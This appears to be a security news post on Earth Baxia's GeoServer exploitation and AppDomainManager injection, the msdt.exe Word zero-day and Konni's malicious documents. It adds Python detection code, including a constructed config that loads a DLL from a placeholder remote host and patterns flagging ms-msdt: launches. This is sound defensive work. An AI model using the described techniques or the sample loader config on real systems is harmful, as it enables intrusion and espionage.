
Earth Baxia Exploits GeoServer to Launch APAC Spear-Phishing Attacks


An analysis by Trend Micro indicates that the cyber espionage group Earth Baxia has been targeting government agencies in Taiwan, and potentially other countries in the Asia-Pacific (APAC) region, through spear-phishing campaigns and exploitation of CVE-2024-36401, a critical vulnerability in GeoServer. 

The activity is part of an ongoing campaign aimed at key sectors, including telecommunications, energy and government. GeoServer, an open-source platform for sharing geospatial data, has had several vulnerabilities; the one exploited here, CVE-2024-36401, allows remote code execution. 

Earth Baxia exploited this vulnerability to pull malicious components directly into the victim environment, using tools such as curl and scp to fetch files including customized Cobalt Strike beacons and other payloads. With these payloads in place, the attackers were able to execute arbitrary commands on the compromised systems, giving them a foothold in those environments. 

The Earth Baxia threat actor used a wide range of techniques to break into organizations in several Asia-Pacific countries, targeting government bodies, telecommunications companies and the energy industry. The group combined spear-phishing emails with exploitation of the GeoServer vulnerability (CVE-2024-36401) to achieve its goals. 

The attackers deployed custom Cobalt Strike components as well as a new backdoor, called EAGLEDOOR, on the compromised computers. EAGLEDOOR supports multiple communication protocols for gathering information and delivering payloads. To make tracking harder, the attackers hosted their malicious files on public cloud services. 

They also deployed additional payloads using techniques such as GrimResource and AppDomainManager injection. Countries affected by this campaign include Taiwan, the Philippines, South Korea, Vietnam, Thailand and possibly China. The subject lines of the emails are tailored to each target with varying content, and the attached ZIP file contains an MSC file called RIPCOY, which serves as the decoy. 

When the file is double-clicked, the embedded obfuscated VBScript, launched through the GrimResource technique, attempts to download multiple files from a public cloud service, typically Amazon Web Services. Along with a decoy PDF document, the downloaded set includes .NET applications and a configuration file. 

The .NET applications and configuration files dropped by the MSC file are used for a technique known as AppDomainManager injection, which loads a custom application domain manager into the target application's process so that it can run arbitrary code. 

The mechanism lets any .NET application load an arbitrary managed DLL, locally or remotely, without directly invoking any Windows API calls. The legitimate .NET application then fetches the next-stage downloader from a URL specified in its application configuration file (.config), which points to a file containing a .NET DLL. 
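The configuration-file side of the AppDomainManager injection described above is something a defender can scan for. The following is an added example, not code from the Trend Micro report or from this post: it parses a .NET app.config and flags a custom AppDomainManager entry under `<runtime>` and any `codeBase` that points to a remote URL. Both sample configs are constructed, and the assembly name, type name and URL in them are placeholders.

```python
# Added example, not code from the Trend Micro report or this post: a small
# scanner for the configuration-file side of AppDomainManager injection.
# A .NET app.config can name a custom AppDomainManager in its <runtime>
# element; a legitimate .NET binary dropped next to a crafted .config then
# loads that managed DLL itself. Sample configs and names are placeholders.
import xml.etree.ElementTree as ET

CLEAN_CONFIG = """<?xml version="1.0"?>
<configuration>
  <runtime />
</configuration>"""

SUSPICIOUS_CONFIG = """<?xml version="1.0"?>
<configuration>
  <runtime>
    <appDomainManagerAssembly value="PlaceholderLoader, Version=1.0.0.0, Culture=neutral, PublicKeyToken=null" />
    <appDomainManagerType value="PlaceholderLoader.Manager" />
    <assemblyBinding xmlns="urn:schemas-microsoft-com:asm.v1">
      <dependentAssembly>
        <assemblyIdentity name="PlaceholderLoader" />
        <codeBase version="1.0.0.0" href="https://example.invalid/PlaceholderLoader.dll" />
      </dependentAssembly>
    </assemblyBinding>
  </runtime>
</configuration>"""

ASM_NS = {"asm": "urn:schemas-microsoft-com:asm.v1"}

def scan_config(xml_text: str) -> list:
    """Return findings for one app.config; an empty list means nothing flagged."""
    findings = []
    runtime = ET.fromstring(xml_text).find("runtime")
    if runtime is None:
        return findings
    # Indicator 1: the runtime element names a custom AppDomainManager.
    asm = runtime.find("appDomainManagerAssembly")
    typ = runtime.find("appDomainManagerType")
    if asm is not None or typ is not None:
        findings.append("custom AppDomainManager: assembly=%s type=%s" % (
            asm.get("value") if asm is not None else None,
            typ.get("value") if typ is not None else None))
    # Indicator 2: a codeBase that fetches the assembly from a remote URL,
    # which is how a loader can be pulled from a cloud-hosted location.
    for cb in runtime.iterfind(".//asm:codeBase", ASM_NS):
        href = cb.get("href", "")
        if href.lower().startswith(("http://", "https://")):
            findings.append("remote codeBase: " + href)
    return findings
```

Run `scan_config()` over every `*.exe.config` found next to an unexpected signed .NET binary; a clean config returns an empty list.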

The download URL is AES-encrypted and Base64-encoded. At this stage the download sites were mostly hosted on public cloud services, usually Aliyun. The DLL retrieves the shellcode and executes it with the CreateThread API, so the whole stage runs entirely in memory. Trend Micro Vision One Threat Intelligence provides the following:  

Keeping pace with emerging threats is Trend Micro customers' number one priority, which is why Trend Micro Vision One users have access to a range of Intelligence Reports and Threat Insights. With Threat Insights, customers will be able to stay on top of cyber threats long before they happen and be more prepared when new cyber threats emerge. This report contains comprehensive information about threat actors, their malicious activities, and the techniques that they employ to harm users. 

Using this intelligence as a basis for proactive measures, customers can reduce their risk and respond effectively to threats by taking steps to protect their environment early. Earth Baxia is likely based in China and carries out sophisticated campaigns against government and energy sector targets across the Asia-Pacific region. 

To gain access and exfiltrate data, the group combines GeoServer exploitation, spear-phishing and customized malware (Cobalt Strike and EAGLEDOOR). Because EAGLEDOOR supports a wide range of protocols and the group hosts its malicious files on public cloud services, its operations are complex and highly adaptable. 

Continuous vigilance and sophisticated threat detection measures are essential to deal with such threats effectively. To mitigate the associated risks, security teams are advised to implement several best practices. One critical measure is continuous phishing awareness training for all employees, which keeps staff informed about evolving phishing techniques and better equipped to identify and respond to malicious attempts. 

Additionally, employees should be encouraged to thoroughly verify the sender and subject of any emails, especially those originating from unfamiliar sources or containing ambiguous subject lines. This practice helps in identifying potentially harmful communications before they lead to further complications. It is equally important to deploy multi-layered protection solutions, which serve to detect and block threats early in the malware infection chain. Such solutions enhance the organization’s overall security posture by providing multiple defences, significantly reducing the likelihood of a successful attack.

Word Document Scam Alert: Windows Users Vulnerable to Cyber Exploits


A recently discovered bug lets attackers execute code remotely through all versions of Microsoft's proprietary MSHTML browser engine without having to install anything. Attackers are taking advantage of this zero-day vulnerability in Microsoft Word with specially crafted documents. 

MSHTML is also used by Microsoft products such as Skype, Visual Studio and Outlook, among others, so the problem is widespread. Attackers have exploited the zero-day vulnerability in a Windows tool via malicious Word documents to compromise networks, for which Microsoft has issued a workaround for administrators. 

VirusTotal, the Google-owned malware-scanning service, received a malicious Word document on 25 May that had been uploaded over the weekend from a Belarusian IP address. Kevin Beaumont's analysis found that the malicious document (the "maldoc") was able to run code through the legitimate Microsoft Support Diagnostic Tool (msdt.exe) even with macros disabled. 
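The behaviour Beaumont describes, a Word document launching msdt.exe with macros disabled, is visible in process-creation telemetry. The following is an added example, not code from this post or from Beaumont's analysis: a detection pass over constructed process-creation events that flags msdt.exe spawned by an Office application, or invoked through the ms-msdt: URL handler from any parent. The field names and every sample event are assumptions made for this example.

```python
# Added example, not from this post or from Beaumont's analysis: a detection
# pass over constructed process-creation events that flags the behaviour
# described above, msdt.exe being launched by an Office application or via
# the ms-msdt: URL handler, which works whether or not macros are enabled.
# Field names and all sample events are assumptions made for this example.
from typing import Optional

OFFICE_PARENTS = {"winword.exe", "excel.exe", "powerpnt.exe", "outlook.exe"}

# Constructed sample log: tab-separated parent image, image, command line.
# The ms-msdt: argument is a placeholder, not a real troubleshooter id.
SAMPLE_EVENTS = (
    "parent_image\timage\tcommand_line\n"
    "C:\\Windows\\explorer.exe\tC:\\Program Files\\Microsoft Office\\root\\Office16\\WINWORD.EXE\tWINWORD.EXE /n report.docx\n"
    "C:\\Program Files\\Microsoft Office\\root\\Office16\\WINWORD.EXE\tC:\\Windows\\System32\\msdt.exe\tmsdt.exe ms-msdt:/id PLACEHOLDER-ID\n"
    "C:\\Windows\\explorer.exe\tC:\\Windows\\System32\\msdt.exe\tmsdt.exe /id NetworkDiagnosticsWeb\n"
    "C:\\Windows\\explorer.exe\tC:\\Windows\\System32\\msdt.exe\tmsdt.exe ms-msdt:/id PLACEHOLDER-ID\n"
)

def basename(path: str) -> str:
    """Lower-cased file name of a Windows or POSIX path."""
    return path.replace("/", "\\").rsplit("\\", 1)[-1].lower()

def classify(parent_image: str, image: str, command_line: str) -> Optional[str]:
    """Return a verdict string for one event, or None if it looks benign."""
    if basename(image) != "msdt.exe":
        return None
    parent = basename(parent_image)
    if parent in OFFICE_PARENTS:
        # An Office app has no business starting the diagnostic tool; this is
        # the document-to-msdt.exe chain and it does not depend on macros.
        return "high: msdt.exe spawned by Office (%s)" % parent
    if "ms-msdt:" in command_line.lower():
        # The URL-handler form from a non-Office parent is worth a look too.
        return "medium: msdt.exe invoked through the ms-msdt: URL handler"
    return None

def scan(events_tsv: str) -> list:
    """Run classify() over a TSV log; returns (event number, verdict) pairs."""
    hits = []
    lines = events_tsv.strip().splitlines()
    header = lines[0].split("\t")
    for n, line in enumerate(lines[1:], start=1):
        row = dict(zip(header, line.split("\t")))
        verdict = classify(row["parent_image"], row["image"], row["command_line"])
        if verdict:
            hits.append((n, verdict))
    return hits
```

On the constructed sample, only the Office-spawned and URL-handler launches are flagged; the ordinary troubleshooter launch from Explorer is left alone.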

The malicious Word document reaches MSDT through the Windows ms-msdt URL protocol in order to execute its payload. MSDT is normally used to run downloadable "troubleshooter packs". 

Separately, North Korean actors are using malicious Microsoft Word documents to steal sensitive information from Russian targets by exploiting weaknesses in their security software. 

Fortinet researcher Cara Lin observed a group called Konni (which overlaps so much with Kimsuky, also known as APT43, that it may be the same group) delivering a malicious Russian-language Microsoft Word document as an email attachment. The document uses a macro, which is typical for malware delivered as a file attachment. 

The distributed document contains a Russian-language article that apparently describes Western assessments of the progress of the "Special Military Operation". The Hacker News noted that Konni is "notable" for its anti-Russian focus.  

The group mostly relies on spear-phishing emails and malicious documents to gain access to targets' endpoints. Earlier attacks that took advantage of a WinRAR vulnerability (CVE-2023-38831) were reportedly spotted by researchers at Knowsec and ThreatMon. 

According to ThreatMon, Konni's main objectives are data exfiltration and espionage around the world. The group uses a wide array of malware and tools to accomplish this, frequently adapting its tactics to avoid detection. Attacks on Russian firms by North Korean hackers are not new; similar campaigns have been seen before.